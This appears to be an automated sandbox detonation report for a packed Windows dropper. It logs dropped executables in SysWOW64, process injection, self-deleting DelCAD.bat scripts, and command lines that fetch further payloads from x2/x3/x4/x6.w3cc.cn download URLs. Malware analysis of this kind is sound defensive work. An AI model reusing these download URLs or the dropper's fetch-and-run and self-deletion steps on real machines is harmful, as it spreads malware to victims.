Analysis Overview
SHA256
71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
Threat Level: Shows suspicious behavior
The file adf042c909d919ccca72d1bcf7338e71 was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
ASPack v2.12-2.42
Loads dropped DLL
Checks computer location settings
Drops file in System32 directory
Unsigned PE
Enumerates physical storage devices
Runs ping.exe
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-29 06:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-29 06:45
Reported
2024-02-29 06:48
Platform
win7-20240221-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\yXvPpK.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\CjQlMj.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\McooHs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\DsaQDn.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\gpVDWz.exe | N/A |
Loads dropped DLL
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\yXvPpK.exe | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\yXvPpK.exe | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\CjQlMj.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\McooHs.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\DsaQDn.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\DelCAD.bat | C:\Windows\SysWOW64\CjQlMj.exe | N/A |
| File created | C:\Windows\SysWOW64\gpVDWz.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\DelCAD.bat | C:\Windows\SysWOW64\McooHs.exe | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe
"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"
C:\Windows\SysWOW64\yXvPpK.exe
"C:\Windows\system32\yXvPpK.exe" showautoC:\Windows\system32\eMEgKoPo.dll
C:\Windows\SysWOW64\CjQlMj.exe
"C:\Windows\system32\CjQlMj.exe" C:\Windows\system32\BygFkM2.exe http://x6.w3cc.cn/dw/down2.exe
C:\Windows\SysWOW64\McooHs.exe
"C:\Windows\system32\McooHs.exe" C:\Windows\system32\zcynDy2.exe http://x2.w3cc.cn/dw/down2.exe
C:\Windows\SysWOW64\DsaQDn.exe
"C:\Windows\system32\DsaQDn.exe" C:\Windows\system32\YwLroS2.exe http://x4.w3cc.cn/dw/down2.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Windows\system32\DelCAD.bat
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\gpVDWz.exe
"C:\Windows\system32\gpVDWz.exe" C:\Windows\system32\kPcInM2.exe http://x2.w3cc.cn/dw/down2.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Windows\system32\DelCAD.bat
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | x6.w3cc.cn | udp |
| CN | 182.61.201.92:80 | x6.w3cc.cn | tcp |
| CN | 182.61.201.50:80 | x6.w3cc.cn | tcp |
| US | 8.8.8.8:53 | x2.w3cc.cn | udp |
| CN | 182.61.201.50:80 | x2.w3cc.cn | tcp |
| CN | 182.61.201.90:80 | x2.w3cc.cn | tcp |
| CN | 182.61.201.90:80 | x2.w3cc.cn | tcp |
| CN | 182.61.201.91:80 | x2.w3cc.cn | tcp |
| US | 8.8.8.8:53 | x4.w3cc.cn | udp |
| CN | 182.61.201.50:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.91:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.90:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.92:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.50:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.91:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.90:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.92:80 | x4.w3cc.cn | tcp |
Files
\Windows\SysWOW64\yXvPpK.exe
| MD5 | adf042c909d919ccca72d1bcf7338e71 |
| SHA1 | bf9be4f139b3742d94593f3079f1f8836e5f5bb4 |
| SHA256 | 71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd |
| SHA512 | d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173 |
\Windows\SysWOW64\CjQlMj.exe
| MD5 | 78cd588e48bf05f83ac4d2e5bd3d32e2 |
| SHA1 | c96060325a397b397a1d60076ce6e2c11f309a4f |
| SHA256 | 5309590bc560b29b521f62e20b8d31ef848501814542939b6b943add30afa85e |
| SHA512 | 8cddb7332eec1e036b8466dd07c36557e471e531bfb191254d9c79d1212115378adc0a3111b983c168ce9fe09230ed1797dca4ab30fe16c3f735b98cee273e65 |
memory/2552-19-0x0000000000400000-0x0000000000418000-memory.dmp
memory/2172-34-0x0000000000400000-0x0000000000418000-memory.dmp
C:\Windows\SysWOW64\DelCAD.bat
| MD5 | 55ddc7c397dac5382bffc27028613cf2 |
| SHA1 | cd1ec3db09b2c87dbc12af0cee2e61c2811b7248 |
| SHA256 | 7af73cc02994867d8df3f7f35ba4b6533566fa66b0a332fcdd6154eaba8268f1 |
| SHA512 | bd47ce4081fda66661ac783618e3caf38c86012b669e25e10c376f696c468ac867f955f3ae33e4d9633df7c2ac7e5b9606f17064589343ba562cb8fe954b6026 |
memory/2552-58-0x0000000000400000-0x0000000000418000-memory.dmp
memory/1592-62-0x0000000000400000-0x0000000000418000-memory.dmp
C:\Windows\SysWOW64\DelCAD.bat
| MD5 | 3b9f74672e6599f4d582d25049c67775 |
| SHA1 | b07fea6b6986218b56665ff196295e53a1ab9028 |
| SHA256 | 60439805131c49c394e0a28e070e4a7ca6956eb3e0c3c7137d16993fa3217311 |
| SHA512 | 8791d98b7ab472d43595f1c85d4c21916eae04b294d8e1c1ed5685fb94d64b3e7236b1e917c784395f13c9ce9521df14978d3e6ecec21b1bb8ebf0f04569acfb |
memory/2172-86-0x0000000000400000-0x0000000000418000-memory.dmp
memory/888-90-0x0000000000400000-0x0000000000418000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-29 06:45
Reported
2024-02-29 06:48
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SOupMF.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\DMWgpy.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\xBjOcu.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\RMsoSA.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\eytYFB.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\DMWgpy.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\xBjOcu.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\RMsoSA.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\DelCAD.bat | C:\Windows\SysWOW64\DMWgpy.exe | N/A |
| File created | C:\Windows\SysWOW64\eytYFB.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\DelCAD.bat | C:\Windows\SysWOW64\xBjOcu.exe | N/A |
| File created | C:\Windows\SysWOW64\SOupMF.exe | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\SOupMF.exe | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe
"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"
C:\Windows\SysWOW64\SOupMF.exe
"C:\Windows\system32\SOupMF.exe" showautoC:\Windows\system32\RQYknvIR.dll
C:\Windows\SysWOW64\DMWgpy.exe
"C:\Windows\system32\DMWgpy.exe" C:\Windows\system32\JSNVfa2.exe http://x2.w3cc.cn/dw/down2.exe
C:\Windows\SysWOW64\xBjOcu.exe
"C:\Windows\system32\xBjOcu.exe" C:\Windows\system32\vEzIRa2.exe http://x3.w3cc.cn/dw/down2.exe
C:\Windows\SysWOW64\RMsoSA.exe
"C:\Windows\system32\RMsoSA.exe" C:\Windows\system32\DyeLGo2.exe http://x4.w3cc.cn/dw/down2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\eytYFB.exe
"C:\Windows\system32\eytYFB.exe" C:\Windows\system32\sFAvzS2.exe http://x3.w3cc.cn/dw/down2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | x2.w3cc.cn | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| CN | 182.61.201.90:80 | x2.w3cc.cn | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| CN | 182.61.201.91:80 | x2.w3cc.cn | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | x3.w3cc.cn | udp |
| CN | 182.61.201.90:80 | x3.w3cc.cn | tcp |
| CN | 182.61.201.92:80 | x3.w3cc.cn | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| CN | 182.61.201.91:80 | x3.w3cc.cn | tcp |
| CN | 182.61.201.50:80 | x3.w3cc.cn | tcp |
| US | 8.8.8.8:53 | x4.w3cc.cn | udp |
| CN | 182.61.201.50:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.92:80 | x4.w3cc.cn | tcp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| CN | 182.61.201.90:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.50:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.90:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.91:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.91:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.92:80 | x4.w3cc.cn | tcp |
| US | 8.8.8.8:53 | 214.80.50.20.in-addr.arpa | udp |
Files
C:\Windows\SysWOW64\SOupMF.exe
| MD5 | adf042c909d919ccca72d1bcf7338e71 |
| SHA1 | bf9be4f139b3742d94593f3079f1f8836e5f5bb4 |
| SHA256 | 71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd |
| SHA512 | d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173 |
C:\Windows\SysWOW64\DMWgpy.exe
| MD5 | 78cd588e48bf05f83ac4d2e5bd3d32e2 |
| SHA1 | c96060325a397b397a1d60076ce6e2c11f309a4f |
| SHA256 | 5309590bc560b29b521f62e20b8d31ef848501814542939b6b943add30afa85e |
| SHA512 | 8cddb7332eec1e036b8466dd07c36557e471e531bfb191254d9c79d1212115378adc0a3111b983c168ce9fe09230ed1797dca4ab30fe16c3f735b98cee273e65 |
memory/3096-17-0x0000000000400000-0x0000000000418000-memory.dmp
memory/3884-31-0x0000000000400000-0x0000000000418000-memory.dmp
memory/3096-49-0x0000000000400000-0x0000000000418000-memory.dmp
C:\Windows\SysWOW64\DelCAD.bat
| MD5 | 9c439a87b83755cde8511cf65e13e54e |
| SHA1 | a72df147498f15d16d4004f73733d2602390e981 |
| SHA256 | d7c7639aa7fbe036c11bf35908fb2aa26171902482bb250233af19cd8f655bf3 |
| SHA512 | c483a77a2496f2daca73613be8a317c6fbf92de9cb569a0dd75a27f30fa4d6f251a4a1d26e3808716128cf4f48c72cbd81b5380c9b2d981be9be300eb49155eb |
memory/3108-52-0x0000000000400000-0x0000000000418000-memory.dmp
memory/3884-70-0x0000000000400000-0x0000000000418000-memory.dmp
C:\Windows\SysWOW64\DelCAD.bat
| MD5 | 544926ed36528740dfc1d64a602e6d5c |
| SHA1 | 7837ae9e7da6054b79b1f1cbe810d838ed0ee3c5 |
| SHA256 | 6e7bd49e44ffa47502cceb6fcf39dcb048d716cbe9f95b360c145b5fea64eec7 |
| SHA512 | 8425d3c4282b576878c5ecc2a327634399338e626fd738192d2c766f8ecfa7f4bf539b476757c9174f111b6b7d108a39f90aaffcdc4b93ffda65b5594cb7210b |
memory/5104-73-0x0000000000400000-0x0000000000418000-memory.dmp